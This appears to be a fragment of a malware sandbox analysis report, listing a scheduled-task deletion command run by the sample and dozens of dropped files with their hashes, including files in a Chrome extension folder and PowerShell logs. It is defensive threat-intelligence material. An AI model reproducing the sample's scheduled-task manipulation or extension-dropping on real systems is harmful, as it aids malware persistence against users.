PID:5084 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "wVNtBGnRpnzfZepfO"3⤵PID:1364
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
129B
MD5a526b9e7c716b3489d8cc062fbce4005
SHA12df502a944ff721241be20a9e449d2acd07e0312
SHA256e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066
SHA512d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88
-
Filesize
2KB
MD5bfdedba9aae69d1a5d5994dbdbcb72eb
SHA18a76eea268dd6a7ca556f2b89471eb7972a45e81
SHA256a61298a2695445e9bb5c7519c951c4d2b8e5774cd1fe155436fab31d30655390
SHA512659c1339c7042c260e07186194d94bec9979a502d10ee1f7f3c1e8aefc0d0ec4c6ef4eb797ac602ba1510c587ac2ae948600758f7ff6b154b6108b94786cd731
-
Filesize
2KB
MD590e7487082a4ba63b3bd2f24431a0b75
SHA19a51c748646efd4b3142b77012f075e4e7fa0270
SHA256e9db810e2ba53e31b494e65cd14f146b078baa8912ba1ac61beb7b3a61d57b01
SHA512fb96de8199bde0482afaa37fe47a4cfa7a19076dc15ee02d7cc65d03dfebd8f482ff0704af0c9111235692233e2c7ae0b014456654e46da3daf7c79c39816cfd
-
Filesize
2KB
MD53783f1c9be2d425ef03923fece12880c
SHA1e510b380f74611683bb24160c64329095491afbf
SHA25658328f8235bc2730f6efce6984f83aab548fc5b9631fc171313626afa1af8d55
SHA512faac87cae0ca54090a3866d718e9041e2c41874c7602f65b54a14f20c5f00773316a2c1336c0a3d20c734129d9a2e6bb0c8aab64d60e0960a2633706201b7d36
-
Filesize
2KB
MD5beebe7785c07694ce689caeece5cd300
SHA1229113c2a92d962b44a0dfdc6d93054712655792
SHA25664c757c9eae2de5cb96f4f3a3f18a599826c116c1da8b37984b5c3e7dea4420c
SHA512b5093d0bdffe7cb7b9d1886fad018ec27ffed35398084041790f62fbec8e50aad48822bdc9aeeaa3c8263109386c1165771a2f3f3a6444e7c85bb3e808355a52
-
Filesize
2.0MB
MD5321d75c5c80159e9012a83aa131e40df
SHA1a979fcc33941c17210662d9b2c616b30a5a03381
SHA256990310adbfb0f8edde947522041b465d6ec2f8c0f6f7919e39ec1953ab73aa58
SHA51233e40cb17b4d31f87f068b808ae5daeb159374072b327d5af415038274fa371c251d9879a416382e678d2b6f36640904fda8835c22e5c93b1a1ded27e463aca1
-
Filesize
2KB
MD5ca019c9218eab62759d9564792342326
SHA15fe9baebd63cbc00002c22452c5a962130997ed2
SHA256257e6e4f7a02e11ea0cfb2266535cf98f1cf9d1d8f7311efaf01a21e100b0c0a
SHA512d12b914dacfe0fd57ba432cf2470836424d36b094f6aa157b5dc86ac93721cd62348757c3ec1911d5f49da9bc755238910aac365eabc4db2b93bb0bd47c6917e
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
10KB
MD53cddeca28473e26b9fdf14ec8c8d2b9c
SHA13fdba8992f677697aa5babc57e52a688f5a3183e
SHA256758a8d13f4c4ff0e3c16b5ae3918735fb8ee76a7a76fe356159d47e3f226a89d
SHA512515482598b528a8fd61bb980059ee91cf9fe275f515ce6e9957575a949e1b3f12e29ffee53f2b8213f73a35dca070f907144d0e77b1b0d628d355bcc70b22b08
-
Filesize
31KB
MD51e81e42acfa8e1d8d0d3f41301b68d4e
SHA11e77b9a1e38a9924fca643187ec9accb9c3780a1
SHA256a98a98c92fb879f9a696fc1a5a8b7ae7e5b49dc28c8a6032aec9bc44ac6ed544
SHA5129d88e02703fbe2ba64972353acc111e7b94dd772822d4864fde31ca6cb327f573cd4072de0cb40ceff2c80a66ecb0d6de2f21f70fbd323c02207da4b5d271aa0
-
Filesize
12KB
MD5073fc4f521050e086c70015f3f75ddd0
SHA1fcaf173df31e89b0433b1ddbf5cfb0db8b2e75df
SHA256f95d6b1a4b7eb1094590cab2cfa5c38e4ae291cc1f2d322534c932a923796152
SHA512ae08816c5b6688428e3d370a822aa9db3fd24b0ca54242c3672b9a47a1216b0aab0b2315212eac5530d02818721c25a2a60e016fc7763f6cd45a8ae1c4ad4966
-
Filesize
6.4MB
MD5e1ff872348b3052edd4b7581554bc70b
SHA1e1d6bc3f3ac4277de9356529a7d26e6e87cc922e
SHA256041bb9da8cbda297a45446e957289e037514056234cc172d4dba9c3c27b3c068
SHA51233cb94760ee3f8552340c9e793f50e369f9a8fca738dcf4c044014e4054a927b22b3ae380010b6be0c181d1ae3f2901fd274207f3cbc2bd3b9e4c18a4d8f77f9
-
Filesize
6.7MB
MD5e3fbf351ef5be877ef197fac43b7ef47
SHA1fa6fb09c45a31ac7d57d7bc99d5e87af07c9e867
SHA256a3a22fd958ee1abe33535eb3ce53e1fa35f3becf12401d643fa4f9bdce36ad7d
SHA512319cb4a53574980a1a7b3f1f316fcceb38ef6a60b7da023b1d06ee509ef06a6ed76a2f8e68e2fe25a2219f3eaa4c7f5ab845a7f3096916cdd1147a2b230bb59e
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
7KB
MD51928b513574f195f13255532fa9589bc
SHA1ff1548f52c4deb1b7c02a355f9206e35f1895945
SHA256dd86b9eb161738177a318bc6f7c841bc9240f02ff6811ea7d03821deb257a44e
SHA51229b7147c3fd5bdeae9c281c953611a5f15637fcc84fbcb81e50dc67785e4d9c040208722b9f1b0e2148dcc608059a02933cba4bc22efbf08a9dd32ad8cbb7ce9
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize1KB
MD50f5cbdca905beb13bebdcf43fb0716bd
SHA19e136131389fde83297267faf6c651d420671b3f
SHA256a99135d86804f5cf8aaeb5943c1929bd1458652a3318ab8c01aee22bb4991060
SHA512a41d2939473cffcb6beb8b58b499441d16da8bcc22972d53b8b699b82a7dc7be0db39bcd2486edd136294eb3f1c97ddd27b2a9ff45b831579cba6896d1f776b0
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize12KB
MD5d8f806ee4ef63424479382e499304210
SHA18269a6e0d7b97f2dff7c07b8e177575367f488df
SHA25612db8499c4bcb83587a7827c8a75eea462a230acdaa86a1609ec838236562064
SHA5127a959a1015afe78b9c449bea73a7ff52fc0c4a696b7864b25ef9eb1aa5160bfc18e8b5b67ab2447c9aa05a105d4d10f6f32a6c91bc4c80b879f541c9d19baeff
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize12KB
MD59d5dfcf6c6a7427d34a27c7a0ab8a20b
SHA108571e81bf37d6ecd990e44696ea4b0fbbcd5497
SHA2564c6110487b6e69aac07df847d02eb3987f3eb685ec7ba2863b47e211889e237c
SHA512bfbcb3184a631fe6e8835c04e063e05b2905a2b5e2b72f0fc4d64e303a4bd5d5b9f41ec4111f0dadf1ebe456098cf213ad2338b534294685b7c3812003f70b74
-
Filesize
6.5MB
MD5ea12b422cd860ca0caa9110b9f6220d2
SHA1110a6a5d2285c02600e137d639e08b0dec05a3be
SHA256a72a5def229fb3179fd1f846bf8d8920ad120b9092cad7f9b2785a66a719a910
SHA512c858c6c6a54c7e62ae8a77b2e9154c99bf1b9efb402d8fee134f1b5272e081591c5439cffd4ada7efade3290800bebf03c93b27c641b624d0d6de84c3d96f87e
-
Filesize
6KB
MD50ec8fa2b6348b292ff38b290ac896542
SHA183ee448933828f513f994710bf148f1181f76cb7
SHA2562ab0661286b6fc40b7386c59c13564ff37ecd55313fca13b1a76e48bf737a3c3
SHA5122788a4ba4c84cc665db934be774967afd51763e30d957e1dab8fc3d1a189a49db2a8ef11a774fbaed01fb99ec257c4a839e5a3e5753388ed2332ea9e2364a6f5